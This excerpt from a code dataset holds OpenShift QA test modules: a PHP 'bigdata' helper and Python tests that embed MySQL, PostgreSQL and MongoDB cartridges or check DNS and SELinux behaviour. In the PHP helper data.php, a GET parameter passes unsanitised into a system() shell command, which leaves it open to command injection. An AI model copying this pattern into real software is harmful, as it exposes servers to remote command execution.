admin_link_xpath)\n#admin_link.click()\n\n# way3: enter into related page via url\n#driver.get(dev_env + '/admin.cgi')\n\ndriver.close()\n" }, { "alpha_fraction": 0.46589016914367676, "alphanum_fraction": 0.4700499176979065, "avg_line_length": 29.049999237060547, "blob_id": "a5e3da8c9e4f80f298025ea74a1b28c22a560011", "content_id": "ca6f5f2ddfa387b038183f64413cf0c9552de15c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1202, "license_type": "no_license", "max_line_length": 89, "num_lines": 40, "path": "/automation/open/testmodules/RT/cartridge/app_template/bigdata/datadir/data.php", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "<?php\nif(!empty($_GET[\"action\"])) {\n if(empty($_GET[\"size\"])) {\n $size = \"300\";\n }\n else {\n $size = $_GET[\"size\"];\n }\n $OPENSHIFT_DATA_DIR = getenv(\"OPENSHIFT_DATA_DIR\");\n if($_GET[\"action\"] == \"create\") {\n $cmd = \"dd if=/dev/urandom of=\".$OPENSHIFT_DATA_DIR.\"bigfile bs=1M count=\".$size;\n $output = system($cmd, $ret);\n echo \"Command: \".$cmd.\"<br />\";\n if($ret == 0) {\n echo \"The bigfile has been created.<br />\";\n }\n else {\n echo \"Failed to create bigfile under OPENSHIFT_DATA_DIR\";\n }\n }\n elseif($_GET[\"action\"] == \"delete\") {\n $cmd = \"rm -f \".$OPENSHIFT_DATA_DIR.\"bigfile\";\n $output = system($cmd, $ret);\n echo \"The bigfile has been deleted.\";\n }\n elseif($_GET[\"action\"] == \"show\") {\n $filepath = $OPENSHIFT_DATA_DIR.\"bigfile\";\n $cmd = \"ls -lh \".$filepath;\n echo \"Command: \".$cmd.\"\\n\";\n $output = system($cmd, $ret);\n if(file_exists($filepath)) {\n echo \"<br />\".$output;\n echo \"<br />The bigfile exists.\";\n }\n else {\n echo \"<br />The bigfile doesnot exist.\";\n }\n }\n}\n?>\n" }, { "alpha_fraction": 0.5879629850387573, "alphanum_fraction": 0.5941358208656311, "avg_line_length": 36.79166793823242, "blob_id": "6cf529a4a7ff4d371ce2d8af70640b966148c411", "content_id": "a5e7b81f3ba969529466706458644af27dfb28fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4536, "license_type": "no_license", "max_line_length": 163, "num_lines": 120, "path": "/automation/open/testmodules/RT/cartridge/embed_mysql_to_php.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "\"\"\"\nMichal Zimen\[email protected]\nApr 05, 2012\n[rhc-cartridge] embed MySQL instance to PHP application\nhttps://tcms.engineering.redhat.com/case/122451/?from_plan=4962\n\"\"\"\nimport os\nimport sys\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[rhc-cartridge] embed MySQL instance to an PHP application\"\n self.app_type = common.app_types[\"php\"]\n self.app_name = \"php4mysql\"\n self.mysql_v = common.cartridge_types['mysql']\n self.steps_list = []\n\n common.env_setup()\n \n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass EmbedMysqlToPhp(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create a PHP app\", common.create_app, \n function_parameters=[self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_description=\"the app should be created successfully\",\n expect_return=0))\n \n self.steps_list.append(testcase.TestCaseStep(\"Embed mysql to the app\", \n common.embed,\n function_parameters=[self.app_name, \"add-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql cartridge should be embedded successfully\",\n expect_return=0))\n\n def add_page(app_name):\n new_page = \"\"\"<?php\n$con=mysql_connect($_ENV[\"OPENSHIFT_MYSQL_DB_HOST\"].\":\".$_ENV[\"OPENSHIFT_MYSQL_DB_PORT\"], \n $_ENV[\"OPENSHIFT_MYSQL_DB_USERNAME\"], \n $_ENV[\"OPENSHIFT_MYSQL_DB_PASSWORD\"]) or die(mysql_error());\n\nmysql_select_db($_ENV[\"OPENSHIFT_APP_NAME\"], $con);\nmysql_query(\"DROP TABLE IF EXISTS ucctalk\", $con);\nmysql_query(\"CREATE TABLE ucctalk (speaker CHAR(30), title CHAR(60))\",$con);\nmysql_query(\"INSERT INTO ucctalk (speaker,title) VALUES ('Jeremy Zawodny', 'Optimizing MySQL'), ('Sanja Byelkin', 'Sub-Queries in MySQL'), ('Tim Bunce', 'Advanced Perl DBI')\",$con);\n$result=mysql_query(\"SELECT * FROM ucctalk\",$con);\nwhile($row=mysql_fetch_array($result))\n{\n echo $row['speaker'],\", \",$row['title'],\"<br>\";\n}\nmysql_close($con);\n?>\"\"\"\n new_filename = \"mysql.php\"\n f = open(\"%s/php/%s\"%(self.app_name, new_filename), \"w\")\n f.write(new_page)\n f.close()\n cmd = \"cd %s; git add php/%s && git commit -a -m 'changes' && git push\"%(self.app_name, new_filename)\n (status, output) = common.command_getstatusoutput(cmd)\n return status\n\n self.steps_list.append(testcase.TestCaseStep(\n \"Create a page which does some operation with mysql database like mysql.php:\",\n add_page,\n function_parameters=[self.app_name],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n def verify(app_name):\n url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page(url+\"/mysql.php\", 'Jeremy')\n\n self.steps_list.append(testcase.TestCaseStep(\"Verify the MySQL functionality...\",\n verify,\n function_parameters=[self.app_name],\n expect_description=\"The page should be added without errros\",\n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Remove embedded mysql from the app\", \n common.embed,\n function_parameters=[self.app_name, \"remove-\" + common.cartridge_types['mysql']],\n expect_description=\"the mysql should be removed successfully\",\n expect_return=0))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(EmbedMysqlToPhp)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5562242269515991, "alphanum_fraction": 0.5683717727661133, "avg_line_length": 43.41584014892578, "blob_id": "53ec78546cd6734b37d238b99da15147322b2625", "content_id": "1aeec70995f7905b59e853fcaf069bbb3047d3e0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8973, "license_type": "no_license", "max_line_length": 443, "num_lines": 202, "path": "/automation/open/testmodules/RT/cartridge/postgresql_usage.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\"\"\"\nAttila Nagy\[email protected]\nFeb 14, 2012\n\n[US1386][Runtime][cartridge]Embed PostgreSQL cartridge to {rack, perl, wsgi, php, jbossas, jbossews, nodejs, ruby-1.9} app\nhttps://tcms.engineering.redhat.com/case/128838/\nhttps://tcms.engineering.redhat.com/case/128837/\nhttps://tcms.engineering.redhat.com/case/128836/\nhttps://tcms.engineering.redhat.com/case/128835/\nhttps://tcms.engineering.redhat.com/case/128834/\nhttps://tcms.engineering.redhat.com/case/137725/\n\"\"\"\n\nimport os\nimport commands\n\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nWORK_DIR = os.path.dirname(os.path.abspath(__file__))\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1386][Runtime][cartridge]Embed PostgreSQL cartridge to {rack, perl, wsgi, php, jbossas, jbosseap, nodejs} app\"\n try:\n self.test_variant = self.get_variant()\n except:\n self.info(\"Missing Variant, using `zend` as default\")\n self.test_variant = 'zend'\n\n try:\n self.scalable = self.config.tcms_arguments['scalable']\n except:\n self.scalable = False\n if self.scalable:\n self.scalable = True\n\n self.info(\"VARIANT: %s\"%self.test_variant)\n self.app_type = common.app_types[self.test_variant]\n self.app_name = common.getRandomString(10)\n self.git_repo = './' + self.app_name\n self.random1 = common.getRandomString(30)\n self.random2 = common.getRandomString(30)\n\n self.steps_list = []\n\n self.app_config = {\n 'php' : { 'destination' : 'php', 'suffix' : 'php' },\n 'zend' : { 'destination' : 'php', 'suffix' : 'php' },\n 'perl' : { 'destination' : 'perl', 'suffix' : 'pl' },\n 'wsgi' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'python' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'python-2.7' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'python-3.3' : { 'destination' : 'wsgi/application', 'suffix' : 'py' },\n 'rack' : { 'destination' : '', 'suffix' : 'rb' },\n 'ruby' : { 'destination' : '', 'suffix' : 'rb' },\n 'ruby-1.9': { 'destination' : '', 'suffix' : 'rb' },\n 'jbossas' : { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'jbosseap': { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'jbossews': { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'jbossews2': { 'destination' : 'src/main/webapp', 'suffix' : 'jsp' },\n 'nodejs' : { 'destination' : '', 'suffix' : 'js'}}\n\n common.env_setup()\n\n def finalize(self):\n pass\n\nclass PostgresqlUsage(OpenShiftTest):\n\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\n 'Creating an application',\n common.create_app,\n function_parameters = [ self.app_name, \n self.app_type, \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd, \n True, self.git_repo, self.scalable],\n expect_description = 'The app should be created successfully',\n expect_return = 0))\n\n #2\n self.steps_list.append(testcase.TestCaseStep(\n 'Embedding PostgreSQL to the application',\n common.embed,\n function_parameters = [ self.app_name, \n 'add-%s' % ( common.cartridge_types['postgresql'] ), \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd ],\n expect_description = 'PostgreSQL cartridge should be embedded successfully',\n expect_return = 0))\n\n #3\n self.steps_list.append(testcase.TestCaseStep(\n 'Configuring the application',\n self.app_setup,\n expect_description = \"App configuration + deployment should be successfull\",\n expect_return = 0))\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\n 'Writing to the database - Step #1',\n self.postgresql_check_webpage_output,\n function_parameters = [ \"data1\", \"Please visit /show\\..+ to see the data\" ],\n expect_description = \"INSERT operation should be successfull\",\n expect_return = 0))\n\n #5\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking the output of the database - Step #1',\n self.postgresql_check_webpage_output,\n function_parameters = [ \"show\", self.random1 ],\n expect_description = \"We should get the first random value from the database\",\n expect_return = 0))\n\n #6\n self.steps_list.append(testcase.TestCaseStep(\n 'Writing to the database - Step #2',\n self.postgresql_check_webpage_output,\n function_parameters = [ \"data2\", \"Please visit /show\\..+ to see the data\" ],\n expect_description = \"INSERT operation should be successfull\",\n expect_return = 0))\n\n #7\n self.steps_list.append(testcase.TestCaseStep(\n 'Checking the output of the database - Step #2',\n self.postgresql_check_webpage_output,\n function_parameters = [ \"show\", self.random2 ],\n expect_description = \"We should get the second random value from the database\",\n expect_return = 0))\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n def app_setup(self):\n user = OSConf.OSConf()\n user.load_conf()\n apps_cache = OSConf.get_apps(user)\n psql_version = common.cartridge_types['postgresql']\n\n postgresql_url = apps_cache[self.app_name]['embed'][psql_version]['url']\n postgresql_user = apps_cache[self.app_name]['embed'][psql_version]['username']\n postgresql_passwd = apps_cache[self.app_name]['embed'][psql_version]['password']\n postgresql_dbname = apps_cache[self.app_name]['embed'][psql_version]['database']\n postgresql_port = apps_cache[self.app_name]['embed'][psql_version]['port']\n\n app_setup_steps = [\n \"cp -v %s/app_template/postgresql/%s/* %s/%s\" % ( WORK_DIR, self.test_variant, self.git_repo, self.app_config[self.test_variant]['destination'] ),\n \"find %s/%s -type f -print | while read file ; do echo 'Editing file: ' $file ; sed -i -e 's/#pgsql_user#/%s/;s/#pgsql_passwd#/%s/;s/#pgsql_dbname#/%s/;s/#pgsql_host#/%s/;s/#pgsql_port#/%s/;s/#str_random1#/%s/;s/#str_random2#/%s/' $file; done\" % (self.git_repo, self.app_config[self.test_variant]['destination'], postgresql_user, postgresql_passwd, postgresql_dbname, postgresql_url, postgresql_port, self.random1, self.random2 ), \n \"cd %s\" % (self.git_repo),\n \"git add %s\" % (self.app_config[self.test_variant]['destination'] or '.' ),\n \"git commit -a -m deployment\",\n \"git push\" ]\n\n if self.test_variant in ('ruby', 'ruby-1.9', 'rack'):\n app_setup_steps.insert(3, 'bundle install' )\n app_setup_steps.insert(4, 'bundle check' )\n if self.test_variant == 'nodejs':\n app_setup_steps.insert(3, 'rm -f deplist.txt' )#bug if the pg dependency is there...\n if self.test_variant in ('python-2.7','python-3.3'):\n #app_setup_steps.insert(3, \"cp -f %s/../client/data/snapshot_restore_mysql_data/setuppostgresql.py ./setup.py\" % (WORK_DIR))\n app_setup_steps.insert(3, \"sed -i -e \\\"s/#\\s*'psycopg2',/'psycopg2',/g\\\" setup.py\")\n \n ( ret_code, ret_output) = commands.getstatusoutput(\" && \".join(app_setup_steps))\n print ret_output\n return ret_code\n\n def postgresql_check_webpage_output(self, path, pattern):\n app_url = OSConf.get_app_url(self.app_name)\n return common.grep_web_page( \"%s/%s.%s\" % ( app_url, path, self.app_config[self.test_variant]['suffix']), pattern, count=10)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(PostgresqlUsage)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.6057786345481873, "alphanum_fraction": 0.6101861000061035, "avg_line_length": 28.171428680419922, "blob_id": "b2fa9152042fc4f9ec7d38220466d7cc2db8ea01", "content_id": "636c39841486db3489744bafd3cc225745bf3859", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2042, "license_type": "no_license", "max_line_length": 210, "num_lines": 70, "path": "/automation/open/testmodules/RT/client/create_app_without_dns.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\nimport os, sys\n\nimport testcase, common, OSConf\nimport rhtest\nimport database\nimport time\nimport random\n# user defined packages\nimport openshift\n\n\nPASSED = rhtest.PASSED\nFAILED = rhtest.FAILED\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n\tself.user_email = os.environ[\"OPENSHIFT_user_email\"]\n \tself.user_passwd = os.environ[\"OPENSHIFT_user_passwd\"]\n\tself.app_name = common.getRandomString(10)\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n tcms_testcase_id = 141753\n\n \tcommon.env_setup()\n \tself.steps_list = []\n\n def finalize(self):\n pass\n\n\nclass CreateAppWithoutDns(OpenShiftTest):\n def test_method(self):\n\t\n self.steps_list.append(testcase.TestCaseStep(\"Create a app without --no-dns\",\n \"rhc app create %s %s -l %s -p '%s' --no-git --no-dns %s\"%(self.app_name, common.app_types[self.app_type], self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n unexpect_string_list=[\"Cloning into\"],\n expect_return=0))\n\n case = testcase.TestCase(\"create an app with --no-dns option\",\n self.steps_list)\n\n def cleaning():\n cmd= \"rhc app destroy %s -l %s -p '%s' --confirm %s\"%(self.app_name, self.user_email, self.user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS)\n common.command_get_status(cmd)\n\n case.add_clean_up(cleaning)\n case.run()\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(CreateAppWithoutDns)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n" }, { "alpha_fraction": 0.5736401677131653, "alphanum_fraction": 0.5845188498497009, "avg_line_length": 29.240507125854492, "blob_id": "06ae2738aef70c9df8ec77da74f742ec8029f9e3", "content_id": "3a21e9764e268297594cfea48b90adfdfaa07a31", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2390, "license_type": "no_license", "max_line_length": 110, "num_lines": 79, "path": "/automation/open/testmodules/RT/cartridge/ssh_selinux_transition.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#\n# File name: ssh_selinux_transition.py\n# Date: 2012/02/13 10:07\n# Author: [email protected]\n#\n\nimport sys\nimport os\nimport testcase\nimport common\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n def initialize(self):\n self.summary =\"[US1657][Runtime][rhc-cartridge] SSH Transition protection\"\n try:\n self.app_type = self.config.test_variant\n except:\n self.app_type = 'php'\n\n self.app_name = 'selinuxapp'\n self.tcms_testcase_id = 130919\n\n self.steps_list = []\n\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s\"%(self.app_name))\n\nclass SshSelinuxTransisition(OpenShiftTest):\n def test_method(self):\n self.steps_list.append(testcase.TestCaseStep(\"Create sample application\",\n common.create_app,\n function_parameters=[self.app_name, \n common.app_types[self.app_type], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n pexpect_cmd = [\n ('sendline', 'ps -efwwZ |grep grep'),\n ('expect', 'unconfined_u:system_r:openshift_t:.*grep grep')\n ]\n\n self.steps_list.append(testcase.TestCaseStep(\"Login through RHCSH and check the SELinux label\",\n common.rhcsh,\n function_parameters = [self.app_name, pexpect_cmd],\n expect_return = 0,\n expect_description=\"Tenants' sshd process should be labled as openshift_t instead of ssh_t.\"))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = OpenShiftTestSuite(conf)\n suite.add_test(SshSelinuxTransisition)\n return suite\n\ndef run(conf):\n suite = get_suite(conf)\n suite()\n\n#\n# end of ssh_selinux_transition.py\n#\n# vim: set tabstop=4:shiftwidth=4:expandtab: \n" }, { "alpha_fraction": 0.5359981060028076, "alphanum_fraction": 0.5426732301712036, "avg_line_length": 49.135459899902344, "blob_id": "a4ac37c8fa1dcada758731af6b2564be56063c23", "content_id": "3590178ff005a50167b4d5068f51192b3bd9701b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12584, "license_type": "no_license", "max_line_length": 220, "num_lines": 251, "path": "/automation/open/testmodules/RT/cartridge/add_control_remove_mongodb.py", "repo_name": "fdumpling/practices", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\nimport os\nimport testcase\nimport common\nimport OSConf\nimport rhtest\n\nclass OpenShiftTest(rhtest.Test):\n INTERACTIVE = False\n\n def initialize(self):\n self.summary = \"[US1209][US1347][Runtime][cartridge]embed MongoDB to all kinds of app\\n[US1209][Runtime][cartridge]Control embed mongodb\"\n try:\n test_name = self.get_variant()\n except:\n self.info(\"Missing variant, used 'php' as default\")\n test_name = 'php'\n\n try:\n self.environment = self.config.options.run_mode\n except:\n self.info(\"Missing self.config.options.run_mode, used 'DEV' as default\")\n self.environment = \"DEV\"\n self.info(\"VARIANT: %s\"%test_name)\n self.app_type = common.app_types[test_name]\n self.app_name = common.getRandomString(10)\n tcms_testcase_id=121913\n self.steps_list = []\n common.env_setup()\n\n def finalize(self):\n os.system(\"rm -rf %s* \"%(self.app_name))\n\nclass AddControlRemoveMongodb(OpenShiftTest):\n def test_method(self):\n app_name = self.app_name\n self.steps_list.append(testcase.TestCaseStep(\"Create a %s application\" %(self.app_type),\n common.create_app,\n function_parameters=[self.app_name, self.app_type, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd],\n expect_return=0,\n expect_description=\"App should be created successfully\"))\n\n#this will be as __OUTPUT__[2]\n self.steps_list.append(testcase.TestCaseStep(\"Get app url\",\n OSConf.get_app_url_X,\n function_parameters = [self.app_name]))\n\n#this will be as __OUTPUT__[3]\n self.steps_list.append(testcase.TestCaseStep(\"Get app uuid\",\n OSConf.get_app_uuid_X,\n function_parameters = [self.app_name]))\n\n #4\n self.steps_list.append(testcase.TestCaseStep(\"Embed MongoDB to this app\",\n common.embed,\n function_parameters=[self.app_name, \n \"add-%s\"%common.cartridge_types['mongodb'], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n #5\n self.steps_list.append(testcase.TestCaseStep(\"Get embeded mongo info - password\",\n OSConf.get_embed_info_X,\n function_parameters=[self.app_name, common.cartridge_types[\"mongodb\"], \"password\"]))\n\n #6\n self.steps_list.append(testcase.TestCaseStep(\"Get embeded mongo info - url\",\n OSConf.get_embed_info_X,\n function_parameters=[self.app_name, common.cartridge_types[\"mongodb\"], \"url\"]))\n\n mongo_shell_write_input_file = \"./mongo_shell_write_input\"\n mongo_shell_read_input_file = \"./config.mongo_shell_read_input\"\n test_Collection_name = \"test\"\n test_data = \"TesterName\"\n\n #7\n command = \"\"\"echo -e 'use %s\\ndb\\nshow collections\\ndb.%s.save({\"name\":\"%s\"})\\nexit\\n' >%s\"\"\" %(self.app_name, test_Collection_name, test_data, mongo_shell_write_input_file)\n self.steps_list.append(testcase.TestCaseStep(\"Write mongo shell input file - write\",\n command, \n expect_return=0))\n\n command = \"\"\"echo -e 'use %s\\ndb\\nshow collections\\ndb.%s.find()\\nexit\\n' >%s\"\"\" %(self.app_name, test_Collection_name, mongo_shell_read_input_file)\n #8\n self.steps_list.append(testcase.TestCaseStep(\"Write mongo shell input file - read\",\n command,\n expect_return=0))\n\n #9\n self.steps_list.append(testcase.TestCaseStep(\"Do some write operation to mongodb\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_write_input_file), \n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_write_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", self.app_name],\n unexpect_string_list=[\"errmsg\"]))\n\n #10\n self.steps_list.append(testcase.TestCaseStep(\n \"Do some query operation to mongodb to check write operation is succesful\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\", \n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", app_name, test_Collection_name, test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #11\n self.steps_list.append(testcase.TestCaseStep(\"Stop this embed db using 'rhc cartridge stop'\",\n \"rhc cartridge stop %s -a %s -l %s -p '%s' %s\" \n %(common.cartridge_types['mongodb'], app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS), \n expect_return=0))\n\n self.steps_list.append(testcase.TestCaseStep(\"Check this db status\",\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" %(common.cartridge_types['mongodb'], app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=[\"MongoDB is stopped\"]))\n\n #12\n self.steps_list.append(testcase.TestCaseStep(\n \"Try to do some query operation to mongodb to check db is NOT running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return = \"!0\",\n expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", \"connect failed\"],\n unexpect_string_list=[test_data,]))\n\n #13\n self.steps_list.append(testcase.TestCaseStep(\"Start this embed db using 'rhc cartridge start'\",\n \"rhc cartridge start %s -a %s -l %s -p '%s' %s\" \n %(common.cartridge_types['mongodb'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n #14\n self.steps_list.append(testcase.TestCaseStep(\"Check this db status\",\n \"rhc cartridge status %s -a %s -l %s -p '%s' %s\" %(common.cartridge_types['mongodb'], app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0,\n expect_string_list=[\"MongoDB is running\"]))\n\n #15\n self.steps_list.append(testcase.TestCaseStep(\n \"Do some query operation to mongodb to check db is running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \n \"MongoDB shell\", \n self.app_name, \n test_Collection_name, \n test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #16\n self.steps_list.append(testcase.TestCaseStep(\"Re-start this embed db using 'rhc cartridge restart'\",\n \"rhc cartridge restart %s -a %s -l %s -p '%s' %s\" \n %(common.cartridge_types['mongodb'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n #17\n self.steps_list.append(testcase.TestCaseStep(\n \"Do some query operation to mongodb to check db is running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\",\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \n \"MongoDB shell\", \n self.app_name, \n test_Collection_name, \n test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #18\n self.steps_list.append(testcase.TestCaseStep(\"Reload this embed db using 'rhc cartridge reload'\",\n \"rhc cartridge reload %s -a %s -l %s -p '%s' %s\" %(common.cartridge_types['mongodb'], self.app_name, self.config.OPENSHIFT_user_email, self.config.OPENSHIFT_user_passwd, common.RHTEST_RHC_CLIENT_OPTIONS),\n expect_return=0))\n\n #19\n self.steps_list.append(testcase.TestCaseStep(\n \"Do some query operation to mongodb to check db is running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n expect_return=0,\n expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", self.app_name, test_Collection_name, test_data],\n unexpect_string_list=[\"errmsg\"]))\n\n #20\n self.steps_list.append(testcase.TestCaseStep(\"Remove MongoDB from this app\",\n common.embed,\n function_parameters=[app_name, \n \"remove-%s\"%common.cartridge_types[\"mongodb\"], \n self.config.OPENSHIFT_user_email, \n self.config.OPENSHIFT_user_passwd],\n expect_return=0))\n\n if self.environment == \"STG\":\n _expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\", \"connect failed\"]\n else:\n _expect_string_list=[\"Welcome to OpenShift shell\", \"MongoDB shell\"]\n\n #21\n self.steps_list.append(testcase.TestCaseStep(\n \"Try to do some query operation to mongodb to check db is NOT running\",\n \"\"\"ssh -t -t %s@%s rhcsh mongo < %s\"\"\" ,\n #%(\"__OUTPUT__[3]\", \"__OUTPUT__[2]\", mongo_shell_read_input_file),\n string_parameters = [OSConf.get_app_uuid_X(self.app_name), \n OSConf.get_app_url_X(self.app_name), \n mongo_shell_read_input_file],\n# expect_return=\"!0\",\n expect_string_list=_expect_string_list,\n unexpect_string_list=[test_data]))\n\n\n case = testcase.TestCase(self.summary, self.steps_list)\n try:\n case.run()\n except testcase.TestCaseStepFail:\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\n if case.testcase_status == 'PASSED':\n return self.passed(\"%s passed\" % self.__class__.__name__)\n if case.testcase_status == 'FAILED':\n return self.failed(\"%s failed\" % self.__class__.__name__)\n\nclass OpenShiftTestSuite(rhtest.TestSuite):\n pass\n\ndef get_suite(conf):\n suite = 